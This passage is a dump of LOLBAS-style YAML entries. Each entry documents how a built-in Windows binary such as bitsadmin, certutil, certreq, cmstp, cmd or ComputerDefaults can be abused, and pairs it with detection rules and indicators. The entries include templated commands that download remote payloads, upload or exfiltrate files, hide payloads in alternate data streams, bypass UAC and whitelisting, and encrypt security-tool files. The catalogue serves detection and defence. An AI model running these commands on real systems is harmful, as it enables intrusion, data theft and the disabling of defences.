https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml - IOC: Child process from bash.exe Resources: - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Link: https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/ Acknowledgement: - Person: Alex Ionescu Handle: '@aionescu' - Person: Asif Matadar Handle: '@d1r4c' - Person: Liran Ravich, CardinalOps ================================================ FILE: yml/OSBinaries/Bitsadmin.yml ================================================ --- Name: Bitsadmin.exe Description: Used for managing 
background intelligent transfer Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique. Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. 
Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset Description: Command for copying cmd.exe to another folder Usecase: Copy file Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. Usecase: Execute binary file specified. Can be used as a defensive evasion. 
Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\bitsadmin.exe - Path: C:\Windows\SysWOW64\bitsadmin.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml - IOC: Child process from bitsadmin.exe - IOC: bitsadmin creates new files - IOC: bitsadmin adds data to alternate data stream Resources: - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://www.soc-labs.top/en/detections/100 Acknowledgement: - Person: Rob Fuller Handle: '@mubix' - Person: Chris Gates Handle: '@carnal0wnage' - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Certoc.yml ================================================ --- Name: CertOC.exe Description: Used for installing certificates Author: 'Ensar Samil' Created: 2021-10-07 Commands: - Command: certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll} Description: Loads the target DLL file Usecase: Execute code within DLL file Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Server 2022 Tags: - Execute: DLL - Command: certoc.exe -GetCACAPS {REMOTEURL:.ps1} Description: Downloads text formatted files Usecase: 
Download scripts, webshells etc. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Server 2022 Full_Path: - Path: c:\windows\system32\certoc.exe - Path: c:\windows\syswow64\certoc.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml - IOC: Process creation with given parameter - IOC: Unsigned DLL load via certoc.exe - IOC: Network connection via certoc.exe Resources: - Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20 Acknowledgement: - Person: Ensar Samil Handle: '@sblmsrsn' ================================================ FILE: yml/OSBinaries/Certreq.yml ================================================ --- Name: CertReq.exe Description: Used for requesting and managing certificates Author: David Middlehurst Created: 2020-07-07 Commands: - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt} Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument). Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal. 
Usecase: Upload Category: Upload Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\certreq.exe - Path: C:\Windows\SysWOW64\certreq.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml - IOC: certreq creates new files - IOC: certreq makes POST requests Resources: - Link: https://dtm.uk/certreq Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ================================================ FILE: yml/OSBinaries/Certutil.yml ================================================ --- Name: Certutil.exe Description: Windows binary used for handling certificates Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe} Description: Download and save an executable to disk in the current folder. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe} Description: Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\` when not. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt Description: Download and save a .ps1 file to an Alternate Data Stream (ADS). 
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -URL {REMOTEURL:.exe} Description: Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\`. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Application: GUI - Command: certutil -encode {PATH} {PATH:.base64} Description: Command to encode a file using Base64 Usecase: Encode files to evade defensive measures Category: Encode Privileges: User MitreID: T1027.013 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil -decode {PATH:.base64} {PATH} Description: Command to decode a Base64 encoded file. Usecase: Decode files to evade defensive measures Category: Decode Privileges: User MitreID: T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil -decodehex {PATH:.hex} {PATH} Description: Command to decode a hexadecimal-encoded file. 
Usecase: Decode files to evade defensive measures Category: Decode Privileges: User MitreID: T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml - Elastic: https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml - IOC: Certutil.exe creating new files on disk - IOC: Useragent Microsoft-CryptoAPI/10.0 - IOC: Useragent CertUtil URL Agent Resources: - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 - Link: https://twitter.com/mattifestation/status/620107926288515072 - Link: https://twitter.com/egre55/status/1087685529016193025 - Link: 
https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/ Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' - Person: Moriarty Handle: '@Moriarty_Meng' - Person: egre55 Handle: '@egre55' - Person: Lior Adar - Person: Adam Handle: '@hexacorn' - Person: SomeTestLeper Handle: '@SomeTestLeper' ================================================ FILE: yml/OSBinaries/Change.yml ================================================ --- Name: Change.exe Description: Remote Desktop Services MultiUser Change Utility Author: 'Idan Lerman' Created: 2025-07-31 Commands: - Command: change.exe user Description: Once executed, `change.exe` will execute `chgusr.exe` in the same folder. Thus, if `change.exe` is copied to a folder and an arbitrary executable is renamed to `chgusr.exe`, `change.exe` will spawn it. Instead of `user`, it is also possible to use `port` or `logon` as command-line option. Usecase: Execute an arbitrary executable via trusted system executable. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Requires: Rename Full_Path: - Path: c:\windows\system32\change.exe - Path: c:\windows\syswow64\change.exe Detection: - IOC: change.exe being executed and executes a child process outside of its normal path of c:\windows\system32\ or c:\windows\syswow64\ Acknowledgement: - Person: Idan Lerman Handle: '@IdanLerman' ================================================ FILE: yml/OSBinaries/Cipher.yml ================================================ --- Name: Cipher.exe Description: File Encryption Utility Author: Adetutu Ogunsowo Created: 2024-11-22 Commands: - Command: cipher /w:{PATH_ABSOLUTE:folder} Description: Zero out a file Usecase: Can be used to forensically erase a file. 
Category: Tamper Privileges: User MitreID: T1485 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: cipher.exe /e {PATH_ABSOLUTE} Description: Encrypt a file Usecase: Can be used to impair defences by e.g. encrypting a critical EDR solution file. Category: Tamper Privileges: Admin MitreID: T1562 OperatingSystem: Windows 10 Full_Path: - Path: c:\windows\system32\cipher.exe - Path: c:\windows\syswow64\cipher.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml - IOC: cipher.exe process with /w on the command line Resources: - Link: https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/ Acknowledgement: - Person: Ade Ogunsowo Handle: "@i_am_tutu" - Person: Alexander Sennhauser Handle: '@conitrade' ================================================ FILE: yml/OSBinaries/Cmd.yml ================================================ --- Name: Cmd.exe Description: The command-line interpreter in Windows Author: Ye Yint Min Thu Htut Created: 2019-06-26 Commands: - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: cmd.exe - < {PATH}:payload.bat Description: Execute payload.bat stored in an Alternate Data Stream (ADS). 
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1059.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: type {PATH_SMB} > {PATH_ABSOLUTE} Description: Downloads a specified file from a WebDAV server to the target file. Usecase: Download/copy a file from a WebDAV server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: type {PATH_ABSOLUTE} > {PATH_SMB} Description: Uploads a specified file to a WebDAV server. Usecase: Upload a file to a WebDAV server Category: Upload Privileges: User MitreID: T1048.003 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - IOC: cmd.exe executing files from alternate data streams. - IOC: cmd.exe creating/modifying file contents in an alternate data stream. 
Resources:
  - Link: https://twitter.com/yeyint_mth/status/1143824979139579904
  - Link: https://twitter.com/Mr_0rng/status/1601408154780446721
  - Link: https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
  - Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type
Acknowledgement:
  - Person: r0lan
    Handle: '@yeyint_mth'
  - Person: Mr.0range
    Handle: '@mr_0rng'

================================================
FILE: yml/OSBinaries/Cmdkey.yml
================================================
---
Name: Cmdkey.exe
Description: Creates, lists, and deletes stored user names and passwords or credentials.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: cmdkey /list
    Description: List cached credentials
    Usecase: Get credential information from host
    Category: Credentials
    Privileges: User
    MitreID: T1078
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\cmdkey.exe
  - Path: C:\Windows\SysWOW64\cmdkey.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml
Resources:
  - Link: https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
  - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey

================================================
FILE: yml/OSBinaries/Cmdl32.yml
================================================
---
Name: cmdl32.exe
Description: Microsoft Connection Manager Auto-Download
Author: Elliot Killick
Created: 2021-08-26
Commands:
  - Command: cmdl32 /vpn /lan %cd%\config
    Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\cmdl32.exe
  - Path: C:\Windows\SysWOW64\cmdl32.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml
  - IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
  - IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
Resources:
  - Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151
  - Link: https://twitter.com/ElliotKillick/status/1455897435063074824
  - Link: https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/
Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'

================================================
FILE: yml/OSBinaries/Cmstp.yml
================================================
---
Name: Cmstp.exe
Description: Installs or removes a Connection Manager service profile.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}
    Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
    Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
    Category: Execute
    Privileges: User
    MitreID: T1218.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: INF
  - Command: cmstp.exe /ni /s {REMOTEURL:.inf}
    Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
    Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: INF
      - Execute: Remote
  - Command: cmstp.exe /nf
    Description: cmstp.exe reads the `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe\CmstpExtensionDll` registry value and passes its data directly to `LoadLibrary`. By modifying this registry value to point to an attacker-controlled DLL, that DLL is sideloaded via `cmstp.exe`.
    Usecase: Proxy execution of a malicious DLL via registry modification.
    Category: Execute
    Privileges: Administrator
    MitreID: T1218.003
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: DLL
      - Requires: Registry Change
Full_Path:
  - Path: C:\Windows\System32\cmstp.exe
  - Path: C:\Windows\SysWOW64\cmstp.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml
  - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
  - IOC: Execution of cmstp.exe without a VPN use case is suspicious
  - IOC: DotNet CLR libraries loaded into cmstp.exe
  - IOC: DotNet CLR Usage Log - cmstp.exe.log
  - IOC: Registry modification to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe\CmstpExtensionDll
Resources:
  - Link: https://twitter.com/NickTyrer/status/958450014111633408
  - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
  - Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
  - Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
  - Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
  - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
  - Link: https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
  - Person: Nick Tyrer
    Handle: '@NickTyrer'
  - Person: Naor Evgi
    Handle: '@ghosts621'

================================================
FILE: yml/OSBinaries/Colorcpl.yml
================================================
---
Name: Colorcpl.exe
Description: Binary that handles color management
Author: Arjan Onwezen
Created: 2023-06-26
Commands:
  - Command: colorcpl {PATH}
    Description: Copies the referenced file to C:\Windows\System32\spool\drivers\color\.
    Usecase: Copies file(s) to a subfolder of a generally trusted folder (c:\Windows\System32), which can be used to hide files or make them blend into the environment.
    Category: Copy
    Privileges: User
    MitreID: T1036.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\colorcpl.exe
  - Path: C:\Windows\SysWOW64\colorcpl.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml
  - IOC: colorcpl.exe writing files
Resources:
  - Link: https://twitter.com/eral4m/status/1480468728324231172
Acknowledgement:
  - Person: eral4m
    Handle: '@eral4m'

================================================
FILE: yml/OSBinaries/ComputerDefaults.yml
================================================
---
Name: ComputerDefaults.exe
Description: ComputerDefaults.exe is a Windows system utility for managing default applications for tasks like web browsing, emailing, and media playback.
Author: Eron Clarke
Created: 2024-09-24
Commands:
  - Command: ComputerDefaults.exe
    Description: Upon execution, ComputerDefaults.exe checks two registry values at HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command; if these are set by an attacker, the set command will be executed as a high-integrity process without a UAC prompt being displayed to the user. See 'resources' for which registry keys/values to set.
    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
    Category: UAC Bypass
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\ComputerDefaults.exe
  - Path: C:\Windows\SysWOW64\ComputerDefaults.exe
Detection:
  - IOC: Event ID 10
  - IOC: A binary or script spawned as a child process of ComputerDefaults.exe
  - IOC: Changes to HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command
  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml
Resources:
  - Link: https://gist.github.com/havoc3-3/812547525107bd138a1a839118a3a44b
Acknowledgement:
  - Person: Eron Clarke

================================================
FILE: yml/OSBinaries/ConfigSecurityPolicy.yml
================================================
---
Name: ConfigSecurityPolicy.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: Ialle Teixeira
Created: 2020-09-04
Commands:
  - Command: ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}
    Description: Upload file, credentials or data exfiltration in general
    Usecase: Upload file
    Category: Upload
    Privileges: User
    MitreID: T1567
    OperatingSystem: Windows 10
  - Command: ConfigSecurityPolicy.exe {REMOTEURL}
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml
  - IOC: ConfigSecurityPolicy storing data into alternate data streams.
  - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
  - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
  - IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
Resources:
  - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads
  - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads
  - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor
  - Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20
Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'
  - Person: Nir Chako (Pentera)
    Handle: '@C_h4ck_0'

================================================
FILE: yml/OSBinaries/Conhost.yml
================================================
---
Name: Conhost.exe
Description: Console Window host
Author: Wietze Beukema
Created: 2022-04-05
Commands:
  - Command: conhost.exe {CMD}
    Description: Execute a command line with conhost.exe as parent process
    Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: conhost.exe --headless {CMD}
    Description: Execute a command line with conhost.exe as parent process
    Usecase: Specify --headless parameter to hide child process window (if applicable)
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
Full_Path:
  - Path: c:\windows\system32\conhost.exe
Detection:
  - IOC: conhost.exe spawning unexpected processes
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml
Resources:
  - Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/
  - Link: https://twitter.com/Wietze/status/1511397781159751680
  - Link: https://twitter.com/embee_research/status/1559410767564181504
  - Link: https://twitter.com/ankit_anubhav/status/1561683123816972288
Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
  - Person: Wietze
    Handle: '@wietze'

================================================
FILE: yml/OSBinaries/Control.yml
================================================
---
Name: Control.exe
Description: Binary used to launch controlpanel items in Windows
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: control.exe {PATH_ABSOLUTE}:evil.dll
    Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: ADS
    Privileges: User
    MitreID: T1218.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: control.exe {PATH_ABSOLUTE:.cpl}
    Description: Execute .cpl file (a CPL is a DLL file with a CPlApplet export function).
    Usecase: Use to execute code and bypass application whitelisting
    Category: Execute
    Privileges: User
    MitreID: T1218.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Windows\System32\control.exe
  - Path: C:\Windows\SysWOW64\control.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
  - IOC: Control.exe executing files from alternate data streams
  - IOC: Control.exe executing library file without cpl extension
  - IOC: Suspicious network connections from control.exe
Resources:
  - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
  - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
  - Link: https://twitter.com/bohops/status/955659561008017409
  - Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items
  - Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'

================================================
FILE: yml/OSBinaries/Csc.yml
================================================
---
Name: Csc.exe
Description: Binary file used by .NET Framework to compile C# code
Author: Oddvar Moe
Created: 2018-05-25
Commands:
